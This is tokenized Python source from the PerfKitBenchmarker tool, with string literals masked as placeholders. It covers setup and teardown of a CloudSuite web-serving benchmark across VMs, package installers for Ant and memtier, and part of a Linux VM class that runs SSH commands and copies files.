flags . FLAGS <EOL> BENCHMARK_NAME = '<STR_LIT>' <EOL> BENCHMARK_CONFIG = """<STR_LIT>""" <EOL> def _SetupFrontend ( benchmark_spec ) : <EOL> frontend = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> backend = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> frontend . Install ( '<STR_LIT>' ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> % ( '<STR_LIT>' , re . escape ( APP_DIR ) , NGINX_CONF ) ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' % NGINX_CONF ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' % APP_DIR ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> % ( BASE_DIR ) ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> % ( OLIO_HOME , APP_DIR ) ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' % ( BASE_DIR , APP_DIR ) ) <EOL> frontend . 
RemoteCommand ( '<STR_LIT>' % APP_DIR ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> % ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> % backend . ip_address , APP_DIR ) ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> % ( '<STR_LIT>' , <EOL> '<STR_LIT>' , APP_DIR ) ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> % ( '<STR_LIT>' , <EOL> '<STR_LIT>' , APP_DIR ) ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> % ( '<STR_LIT>' , backend . ip_address , APP_DIR ) ) <EOL> frontend . Install ( '<STR_LIT>' ) <EOL> php . ConfigureAndBuild ( frontend , PHPRC , True ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % PHPRC ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % PHPRC ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> % ( '<STR_LIT>' , '<STR_LIT>' , PHPRC ) ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> % ( '<STR_LIT>' , '<STR_LIT>' , <EOL> PHPRC ) ) <EOL> php . InstallAPC ( frontend ) <EOL> def _SetupFilestore ( vm ) : <EOL> filestore = posixpath . join ( vm . GetScratchDir ( ) , '<STR_LIT>' ) <EOL> vm . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( APP_DIR , BASE_DIR , filestore , filestore , <EOL> FABAN_HOME ) ) <EOL> vm . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( filestore , JAVA_HOME , FABAN_HOME , filestore ) ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> % ( '<STR_LIT>' , <EOL> '<STR_LIT>' % re . escape ( filestore ) , <EOL> APP_DIR ) ) <EOL> _SetupFilestore ( frontend ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> nginx . Start ( frontend , frontend . firewall ) <EOL> def _SetupBackend ( benchmark_spec ) : <EOL> frontend = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> backend = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> client_ip = benchmark_spec . 
vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . ip_address <EOL> frontend_ip = frontend . ip_address <EOL> backend . Install ( '<STR_LIT>' ) <EOL> untar_command = ( '<STR_LIT>' ) <EOL> backend . RemoteCommand ( untar_command % <EOL> ( BASE_DIR , '<STR_LIT>' ) ) <EOL> copy_command = ( '<STR_LIT>' ) <EOL> backend . RemoteCommand ( copy_command % ( MYSQL_HOME , MY_CNF ) ) <EOL> db_install_command = ( '<STR_LIT>' ) <EOL> backend . RemoteCommand ( db_install_command % ( MYSQL_HOME ) ) <EOL> backend . RobustRemoteCommand ( '<STR_LIT>' % MYSQL_HOME ) <EOL> logging . info ( '<STR_LIT>' ) <EOL> time . sleep ( <NUM_LIT:30> ) <EOL> sql_cmd = '<STR_LIT>' <EOL> backend . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( MYSQL_HOME , sql_cmd ) ) <EOL> backend . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( MYSQL_HOME , frontend_ip ) ) <EOL> backend . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( MYSQL_HOME , FABAN_HOME ) ) <EOL> populate_db_command = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT:%s>' ) <EOL> backend . RobustRemoteCommand ( populate_db_command <EOL> % ( JAVA_HOME , FABAN_HOME , <EOL> FLAGS . cloudsuite_web_serving_load_scale ) ) <EOL> backend . RemoteCommand ( untar_command % <EOL> ( BASE_DIR , '<STR_LIT>' ) ) <EOL> backend . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( BASE_DIR ) ) <EOL> build_tomcat = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> backend . InstallPackages ( '<STR_LIT>' ) <EOL> backend . RemoteCommand ( build_tomcat % ( JAVA_HOME , CATALINA_HOME ) ) <EOL> backend . RemoteCommand ( '<STR_LIT>' % GEOCODER_HOME ) <EOL> backend . RemoteCommand ( '<STR_LIT>' % <EOL> ( client_ip , OLIO_HOME , GEOCODER_HOME ) ) <EOL> backend . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' % GEOCODER_HOME ) <EOL> editor_command = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> backend . 
RemoteCommand ( editor_command % <EOL> ( '<STR_LIT>' , <EOL> GEOCODER_HOME ) ) <EOL> backend . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( GEOCODER_HOME , ANT_HOME , CATALINA_HOME ) ) <EOL> run_tomcat = ( '<STR_LIT>' ) <EOL> backend . RemoteCommand ( run_tomcat % CATALINA_HOME ) <EOL> def _SetupClient ( benchmark_spec ) : <EOL> frontend = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> backend = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> client = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> fw = client . firewall <EOL> fw . AllowPort ( client , <NUM_LIT> ) <EOL> CLIENT_IP = client . ip_address <EOL> BACKEND_IP = backend . ip_address <EOL> FRONTEND_IP = frontend . ip_address <EOL> untar_command = ( '<STR_LIT>' ) <EOL> client . RemoteCommand ( untar_command % ( BASE_DIR , '<STR_LIT>' ) ) <EOL> client . RemoteCommand ( untar_command % <EOL> ( BASE_DIR , '<STR_LIT>' ) ) <EOL> client . RemoteCommand ( untar_command % <EOL> ( BASE_DIR , '<STR_LIT>' ) ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( BASE_DIR , OLIO_HOME ) ) <EOL> copy_command2 = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> client . RemoteCommand ( copy_command2 % ( FABAN_HOME , FABAN_HOME , <EOL> FABAN_HOME , FABAN_HOME , FABAN_HOME , <EOL> FABAN_HOME ) ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % OLIO_HOME ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( re . escape ( FABAN_HOME ) , OLIO_HOME ) ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % OLIO_HOME ) <EOL> build_command = ( '<STR_LIT>' ) <EOL> client . RemoteCommand ( build_command % ( OLIO_BUILD , ANT_HOME ) ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( OLIO_HOME , FABAN_HOME ) ) <EOL> set_java = ( '<STR_LIT>' ) <EOL> client . RemoteCommand ( set_java % ( JAVA_HOME , FABAN_HOME ) ) <EOL> client . 
Install ( '<STR_LIT>' ) <EOL> client . RemoteCommand ( '<STR_LIT>' % CLIENT_IP ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % BASE_DIR ) <EOL> client . RobustRemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> % ( FABAN_HOME , BASE_DIR , BASE_DIR , BASE_DIR , <EOL> OLIO_BUILD , OLIO_BUILD , OLIO_BUILD , <EOL> FABAN_HOME ) ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( CLIENT_IP , FABAN_HOME ) ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( FRONTEND_IP , FABAN_HOME ) ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( re . escape ( MYSQL_HOME ) , FABAN_HOME ) ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( re . escape ( OUTPUT_DIR ) , FABAN_HOME ) ) <EOL> filestore = posixpath . join ( frontend . GetScratchDir ( ) , '<STR_LIT>' ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( re . escape ( filestore ) , FABAN_HOME ) ) <EOL> client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( BACKEND_IP , FABAN_HOME ) ) <EOL> def GetConfig ( user_config ) : <EOL> return configs . LoadConfig ( BENCHMARK_CONFIG , user_config , BENCHMARK_NAME ) <EOL> def CheckPrerequisites ( ) : <EOL> """<STR_LIT>""" <EOL> if FLAGS [ '<STR_LIT>' ] . present and FLAGS . num_vms < <NUM_LIT:3> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> def PreparePrivateKey ( vm ) : <EOL> vm . AuthenticateVm ( ) <EOL> def _PrepareVms ( vm ) : <EOL> vm . Install ( '<STR_LIT>' ) <EOL> vm . Install ( '<STR_LIT>' ) <EOL> vm . Install ( '<STR_LIT>' ) <EOL> vm . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % vm_util . 
VM_TMP_DIR ) <EOL> def Prepare ( benchmark_spec ) : <EOL> """<STR_LIT>""" <EOL> frontend = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> backend = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> client = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> vms = benchmark_spec . vms <EOL> vm_util . RunThreaded ( PreparePrivateKey , vms ) <EOL> vm_util . RunThreaded ( _PrepareVms , vms ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % BASE_DIR ) <EOL> _SetupClient ( benchmark_spec ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' % <EOL> ( client . ip_address , FABAN_HOME , BASE_DIR ) ) <EOL> backend . RemoteCommand ( '<STR_LIT>' % <EOL> ( client . ip_address , FABAN_HOME , BASE_DIR ) ) <EOL> setup_functions = [ _SetupBackend , _SetupFrontend ] <EOL> vm_util . RunThreaded ( lambda f : f ( benchmark_spec ) , setup_functions ) <EOL> def ParseOutput ( client ) : <EOL> stdout , _ = client . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' % OUTPUT_DIR ) <EOL> ops_per_sec = re . findall ( r'<STR_LIT>' , stdout ) <EOL> sum_ops_per_sec = <NUM_LIT:0.0> <EOL> for value in ops_per_sec : <EOL> sum_ops_per_sec += float ( value ) <EOL> sum_ops_per_sec /= <NUM_LIT:2> <EOL> latency = re . findall ( r'<STR_LIT>' , stdout ) <EOL> latency99 = re . findall ( r'<STR_LIT>' , stdout ) <EOL> return sum_ops_per_sec , latency , latency99 <EOL> def Run ( benchmark_spec ) : <EOL> client = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> set_faban_home = ( '<STR_LIT>' ) <EOL> client . RobustRemoteCommand ( set_faban_home % ( FABAN_HOME , FABAN_HOME ) ) <EOL> results = [ ] <EOL> sum_ops_per_sec , latency , latency99 = ParseOutput ( client ) <EOL> results . append ( sample . Sample ( '<STR_LIT>' , <EOL> sum_ops_per_sec , '<STR_LIT>' ) ) <EOL> results . append ( sample . Sample ( '<STR_LIT>' , <EOL> float ( latency [ <NUM_LIT:0> ] ) , '<STR_LIT>' ) ) <EOL> results . append ( sample . 
Sample ( '<STR_LIT>' , <EOL> float ( latency99 [ <NUM_LIT:0> ] ) , '<STR_LIT>' ) ) <EOL> return results <EOL> def Cleanup ( benchmark_spec ) : <EOL> """<STR_LIT>""" <EOL> backend = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> client = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> set_java = ( '<STR_LIT>' ) <EOL> client . RemoteCommand ( set_java % ( JAVA_HOME , FABAN_HOME ) ) <EOL> backend . RemoteCommand ( '<STR_LIT>' % MYSQL_HOME ) <EOL> _CleanupFrontend ( benchmark_spec ) <EOL> def _CleanupFrontend ( benchmark_spec ) : <EOL> frontend = benchmark_spec . vm_groups [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> frontend . RemoteCommand ( '<STR_LIT>' ) <EOL> nginx . Stop ( frontend ) <EOL> filestore = posixpath . join ( frontend . GetScratchDir ( ) , '<STR_LIT>' ) <EOL> frontend . RemoteCommand ( '<STR_LIT>' % filestore ) </s>
<s> """<STR_LIT>""" <EOL> import posixpath <EOL> from perfkitbenchmarker import vm_util <EOL> ANT_TAR_URL = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ANT_HOME_DIR = posixpath . join ( vm_util . VM_TMP_DIR , '<STR_LIT>' ) <EOL> def _Install ( vm ) : <EOL> """<STR_LIT>""" <EOL> vm . Install ( '<STR_LIT>' ) <EOL> vm . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> vm_util . VM_TMP_DIR , ANT_TAR_URL , ANT_HOME_DIR ) ) <EOL> def YumInstall ( vm ) : <EOL> """<STR_LIT>""" <EOL> _Install ( vm ) <EOL> def AptInstall ( vm ) : <EOL> """<STR_LIT>""" <EOL> _Install ( vm ) </s>
<s> """<STR_LIT>""" <EOL> from perfkitbenchmarker import vm_util <EOL> GIT_REPO = '<STR_LIT>' <EOL> GIT_TAG = '<STR_LIT>' <EOL> LIBEVENT_TAR = '<STR_LIT>' <EOL> LIBEVENT_URL = '<STR_LIT>' + LIBEVENT_TAR <EOL> LIBEVENT_DIR = '<STR_LIT>' % vm_util . VM_TMP_DIR <EOL> MEMTIER_DIR = '<STR_LIT>' % vm_util . VM_TMP_DIR <EOL> APT_PACKAGES = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> YUM_PACKAGES = '<STR_LIT>' <EOL> def YumInstall ( vm ) : <EOL> """<STR_LIT>""" <EOL> vm . Install ( '<STR_LIT>' ) <EOL> vm . InstallPackages ( YUM_PACKAGES ) <EOL> vm . Install ( '<STR_LIT>' ) <EOL> vm . RemoteCommand ( '<STR_LIT>' . format ( LIBEVENT_URL , vm_util . VM_TMP_DIR ) ) <EOL> vm . RemoteCommand ( '<STR_LIT>' . format ( vm_util . VM_TMP_DIR , <EOL> LIBEVENT_TAR ) ) <EOL> vm . RemoteCommand ( '<STR_LIT>' . format ( <EOL> LIBEVENT_DIR ) ) <EOL> vm . RemoteCommand ( '<STR_LIT>' . format ( GIT_REPO , MEMTIER_DIR ) ) <EOL> vm . RemoteCommand ( '<STR_LIT>' . format ( MEMTIER_DIR , GIT_TAG ) ) <EOL> pkg_config = '<STR_LIT>' <EOL> vm . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( MEMTIER_DIR , pkg_config ) ) <EOL> def AptInstall ( vm ) : <EOL> """<STR_LIT>""" <EOL> vm . Install ( '<STR_LIT>' ) <EOL> vm . InstallPackages ( APT_PACKAGES ) <EOL> vm . RemoteCommand ( '<STR_LIT>' . format ( GIT_REPO , MEMTIER_DIR ) ) <EOL> vm . RemoteCommand ( '<STR_LIT>' . format ( MEMTIER_DIR , GIT_TAG ) ) <EOL> vm . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( MEMTIER_DIR ) ) <EOL> def _Uninstall ( vm ) : <EOL> """<STR_LIT>""" <EOL> vm . RemoteCommand ( '<STR_LIT>' . format ( MEMTIER_DIR ) ) <EOL> def YumUninstall ( vm ) : <EOL> """<STR_LIT>""" <EOL> _Uninstall ( vm ) <EOL> def AptUninstall ( vm ) : <EOL> """<STR_LIT>""" <EOL> _Uninstall ( vm ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import os <EOL> import pipes <EOL> import posixpath <EOL> import re <EOL> import threading <EOL> import time <EOL> import uuid <EOL> import yaml <EOL> from perfkitbenchmarker import disk <EOL> from perfkitbenchmarker import errors <EOL> from perfkitbenchmarker import flags <EOL> from perfkitbenchmarker import linux_packages <EOL> from perfkitbenchmarker import os_types <EOL> from perfkitbenchmarker import virtual_machine <EOL> from perfkitbenchmarker import vm_util <EOL> FLAGS = flags . FLAGS <EOL> EPEL6_RPM = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> EPEL7_RPM = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> UPDATE_RETRIES = <NUM_LIT:5> <EOL> SSH_RETRIES = <NUM_LIT:10> <EOL> DEFAULT_SSH_PORT = <NUM_LIT> <EOL> REMOTE_KEY_PATH = '<STR_LIT>' <EOL> CONTAINER_MOUNT_DIR = '<STR_LIT>' <EOL> CONTAINER_WORK_DIR = '<STR_LIT>' <EOL> BACKGROUND_IPERF_PORT = <NUM_LIT> <EOL> BACKGROUND_IPERF_SECONDS = <NUM_LIT> <EOL> EXECUTE_COMMAND = '<STR_LIT>' <EOL> WAIT_FOR_COMMAND = '<STR_LIT>' <EOL> flags . DEFINE_bool ( '<STR_LIT>' , False , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> class BaseLinuxMixin ( virtual_machine . BaseOsMixin ) : <EOL> """<STR_LIT>""" <EOL> _pseudo_tty_lock = threading . Lock ( ) <EOL> def __init__ ( self ) : <EOL> super ( BaseLinuxMixin , self ) . __init__ ( ) <EOL> self . ssh_port = DEFAULT_SSH_PORT <EOL> self . remote_access_ports = [ self . ssh_port ] <EOL> self . has_private_key = False <EOL> self . _remote_command_script_upload_lock = threading . Lock ( ) <EOL> self . _has_remote_command_script = False <EOL> def _PushRobustCommandScripts ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . _remote_command_script_upload_lock : <EOL> if not self . _has_remote_command_script : <EOL> for f in ( EXECUTE_COMMAND , WAIT_FOR_COMMAND ) : <EOL> self . PushDataFile ( f , os . path . join ( vm_util . VM_TMP_DIR , <EOL> os . path . basename ( f ) ) ) <EOL> self . 
_has_remote_command_script = True <EOL> def RobustRemoteCommand ( self , command , should_log = False ) : <EOL> """<STR_LIT>""" <EOL> self . _PushRobustCommandScripts ( ) <EOL> execute_path = os . path . join ( vm_util . VM_TMP_DIR , <EOL> os . path . basename ( EXECUTE_COMMAND ) ) <EOL> wait_path = os . path . join ( vm_util . VM_TMP_DIR , <EOL> os . path . basename ( WAIT_FOR_COMMAND ) ) <EOL> uid = uuid . uuid4 ( ) <EOL> file_base = os . path . join ( vm_util . VM_TMP_DIR , '<STR_LIT>' % uid ) <EOL> wrapper_log = file_base + '<STR_LIT>' <EOL> stdout_file = file_base + '<STR_LIT>' <EOL> stderr_file = file_base + '<STR_LIT>' <EOL> status_file = file_base + '<STR_LIT>' <EOL> if not isinstance ( command , basestring ) : <EOL> command = '<STR_LIT:U+0020>' . join ( command ) <EOL> start_command = [ '<STR_LIT>' , '<STR_LIT>' , execute_path , <EOL> '<STR_LIT>' , stdout_file , <EOL> '<STR_LIT>' , stderr_file , <EOL> '<STR_LIT>' , status_file , <EOL> '<STR_LIT>' , pipes . quote ( command ) ] <EOL> start_command = '<STR_LIT>' % ( '<STR_LIT:U+0020>' . join ( start_command ) , <EOL> wrapper_log ) <EOL> self . RemoteCommand ( start_command ) <EOL> wait_command = [ '<STR_LIT>' , wait_path , '<STR_LIT>' , stdout_file , <EOL> '<STR_LIT>' , stderr_file , <EOL> '<STR_LIT>' , status_file , <EOL> '<STR_LIT>' ] <EOL> try : <EOL> return self . RemoteCommand ( '<STR_LIT:U+0020>' . join ( wait_command ) , should_log = should_log ) <EOL> except errors . VirtualMachine . RemoteCommandError : <EOL> stdout , _ = self . RemoteCommand ( '<STR_LIT>' % wrapper_log , should_log = False ) <EOL> if stdout . strip ( ) : <EOL> logging . warn ( '<STR_LIT>' <EOL> '<STR_LIT>' , stdout ) <EOL> raise <EOL> def SetupRemoteFirewall ( self ) : <EOL> """<STR_LIT>""" <EOL> self . RemoteHostCommand ( '<STR_LIT>' ) <EOL> self . RemoteHostCommand ( '<STR_LIT>' ) <EOL> def SetupProxy ( self ) : <EOL> """<STR_LIT>""" <EOL> env_file = "<STR_LIT>" <EOL> commands = [ ] <EOL> if FLAGS . http_proxy : <EOL> commands . 
append ( "<STR_LIT>" % ( <EOL> FLAGS . http_proxy , env_file ) ) <EOL> if FLAGS . https_proxy : <EOL> commands . append ( "<STR_LIT>" % ( <EOL> FLAGS . https_proxy , env_file ) ) <EOL> if FLAGS . ftp_proxy : <EOL> commands . append ( "<STR_LIT>" % ( <EOL> FLAGS . ftp_proxy , env_file ) ) <EOL> if commands : <EOL> self . RemoteCommand ( "<STR_LIT:;>" . join ( commands ) ) <EOL> def SetupPackageManager ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def PrepareVMEnvironment ( self ) : <EOL> self . SetupProxy ( ) <EOL> self . RemoteCommand ( '<STR_LIT>' % vm_util . VM_TMP_DIR ) <EOL> if FLAGS . setup_remote_firewall : <EOL> self . SetupRemoteFirewall ( ) <EOL> if self . install_packages : <EOL> if self . is_static : <EOL> self . SnapshotPackages ( ) <EOL> self . SetupPackageManager ( ) <EOL> self . BurnCpu ( ) <EOL> @ vm_util . Retry ( log_errors = False , poll_interval = <NUM_LIT:1> ) <EOL> def WaitForBootCompletion ( self ) : <EOL> """<STR_LIT>""" <EOL> resp , _ = self . RemoteHostCommand ( '<STR_LIT>' , retries = <NUM_LIT:1> , <EOL> suppress_warning = True ) <EOL> if self . bootable_time is None : <EOL> self . bootable_time = time . time ( ) <EOL> if self . hostname is None : <EOL> self . hostname = resp [ : - <NUM_LIT:1> ] <EOL> def SnapshotPackages ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def RestorePackages ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def PackageCleanup ( self ) : <EOL> """<STR_LIT>""" <EOL> for package_name in self . _installed_packages : <EOL> self . Uninstall ( package_name ) <EOL> self . RestorePackages ( ) <EOL> self . RemoteCommand ( '<STR_LIT>' % vm_util . VM_TMP_DIR ) <EOL> def GetPathToConfig ( self , package_name ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def GetServiceName ( self , package_name ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ vm_util . Retry ( ) <EOL> def FormatDisk ( self , device_path ) : <EOL> """<STR_LIT>""" <EOL> fmt_cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % device_path ) <EOL> self . 
RemoteHostCommand ( fmt_cmd ) <EOL> def MountDisk ( self , device_path , mount_path ) : <EOL> """<STR_LIT>""" <EOL> mnt_cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( device_path , mount_path ) <EOL> self . RemoteHostCommand ( mnt_cmd ) <EOL> def RemoteCopy ( self , file_path , remote_path = '<STR_LIT>' , copy_to = True ) : <EOL> self . RemoteHostCopy ( file_path , remote_path , copy_to ) <EOL> def RemoteHostCopy ( self , file_path , remote_path = '<STR_LIT>' , copy_to = True ) : <EOL> """<STR_LIT>""" <EOL> if vm_util . RunningOnWindows ( ) : <EOL> if '<STR_LIT::>' in file_path : <EOL> file_path = file_path . split ( '<STR_LIT::>' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] <EOL> file_path = '<STR_LIT:/>' . join ( file_path . rsplit ( '<STR_LIT:\\>' , <NUM_LIT:1> ) ) <EOL> remote_location = '<STR_LIT>' % ( <EOL> self . user_name , self . ip_address , remote_path ) <EOL> scp_cmd = [ '<STR_LIT>' , '<STR_LIT>' , str ( self . ssh_port ) , '<STR_LIT>' ] <EOL> scp_cmd . extend ( vm_util . GetSshOptions ( self . ssh_private_key ) ) <EOL> if copy_to : <EOL> scp_cmd . extend ( [ file_path , remote_location ] ) <EOL> else : <EOL> scp_cmd . extend ( [ remote_location , file_path ] ) <EOL> stdout , stderr , retcode = vm_util . IssueCommand ( scp_cmd , timeout = None ) <EOL> if retcode : <EOL> full_cmd = '<STR_LIT:U+0020>' . join ( scp_cmd ) <EOL> error_text = ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( retcode , full_cmd , stdout , stderr ) ) <EOL> raise errors . VirtualMachine . RemoteCommandError ( error_text ) <EOL> def RemoteCommand ( self , command , <EOL> should_log = False , retries = SSH_RETRIES , <EOL> ignore_failure = False , login_shell = False , <EOL> suppress_warning = False , timeout = None ) : <EOL> return self . 
RemoteHostCommand ( command , should_log , retries , <EOL> ignore_failure , login_shell , <EOL> suppress_warning , timeout ) <EOL> def RemoteHostCommand ( self , command , <EOL> should_log = False , retries = SSH_RETRIES , <EOL> ignore_failure = False , login_shell = False , <EOL> suppress_warning = False , timeout = None ) : <EOL> """<STR_LIT>""" <EOL> if vm_util . RunningOnWindows ( ) : <EOL> command = command . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> user_host = '<STR_LIT>' % ( self . user_name , self . ip_address ) <EOL> ssh_cmd = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , str ( self . ssh_port ) , user_host ] <EOL> ssh_cmd . extend ( vm_util . GetSshOptions ( self . ssh_private_key ) ) <EOL> try : <EOL> if login_shell : <EOL> ssh_cmd . extend ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' % command ] ) <EOL> self . _pseudo_tty_lock . acquire ( ) <EOL> else : <EOL> ssh_cmd . append ( command ) <EOL> for _ in range ( retries ) : <EOL> stdout , stderr , retcode = vm_util . IssueCommand ( <EOL> ssh_cmd , force_info_log = should_log , <EOL> suppress_warning = suppress_warning , <EOL> timeout = timeout ) <EOL> if retcode != <NUM_LIT:255> : <EOL> break <EOL> finally : <EOL> if login_shell : <EOL> self . _pseudo_tty_lock . release ( ) <EOL> if retcode : <EOL> full_cmd = '<STR_LIT:U+0020>' . join ( ssh_cmd ) <EOL> error_text = ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( retcode , command , full_cmd , stdout , stderr ) ) <EOL> if not ignore_failure : <EOL> raise errors . VirtualMachine . RemoteCommandError ( error_text ) <EOL> return stdout , stderr <EOL> def MoveFile ( self , target , source_path , remote_path = '<STR_LIT>' ) : <EOL> self . MoveHostFile ( target , source_path , remote_path ) <EOL> def MoveHostFile ( self , target , source_path , remote_path = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . AuthenticateVm ( ) <EOL> remote_location = '<STR_LIT>' % ( <EOL> target . user_name , target . ip_address , remote_path ) <EOL> self . 
